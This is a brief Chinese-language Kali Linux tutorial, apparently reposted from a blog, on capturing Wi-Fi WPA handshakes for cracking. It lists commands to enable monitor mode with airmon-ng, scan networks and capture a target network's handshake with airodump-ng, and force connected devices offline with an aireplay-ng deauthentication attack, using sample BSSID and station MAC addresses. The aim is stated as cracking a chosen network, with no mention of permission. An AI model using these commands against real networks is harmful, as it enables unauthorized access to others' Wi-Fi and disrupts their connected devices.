1、接入一塊外置的無線網卡。

2、查看可用的wifi接口，回顯結果中有wlan0即代表支持監控模式

airmon-ng

3、開啟無線網卡監控模式

airmon-ng start wlan0

?命令執行后網卡接口變為wlan0mon

4、查看wifi網絡

airodump-ng wlan0mon

? ? ? 命令執行后會把周圍的無線網絡按照信號強度由上到下排列到一個列表，當列表中出現你想要破解的wifi網絡后，按CTRL+C停止?。

5、抓取握手包

airodump-ng --bssid AP‘s mac -c channel -w capfile wlan0monairodump-ng --bssid 94:77:2B:20:DD:B4 -c 8 -w cap wlan0mon

6、強制設備下線
? ? ? ?IEEE802.11簡稱WIFI協議，協議設計當初就包含解除認證幀的規定，目的用來通知站點WIFI已斷開，但是由于設計缺陷，很容易被Wi-Fi deauthentication attack，簡稱反認證攻擊（deauth），發動攻擊不需要加密幀數據包，只需要嗅探到連接接入點的設備MAC地址就可發動攻擊，最新的802.11w協議修復了此問題。
執行：

aireplay-ng -0 2 -a {BSSID} -c {MAC} wlan0monaireplay-ng -0 2 -a 94:77:2B:20:DD:B4 -c 74:60:FA:3A:4D:06 wlan0mon

BSSID是步驟3中要破解的wifi信息，MAC是步驟4中獲取到的設備STATION信息。

7、查看抓到的握手包

總結

以上是生活随笔為你收集整理的Kali 工具系列【2】在kali linux 上抓取握手包的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。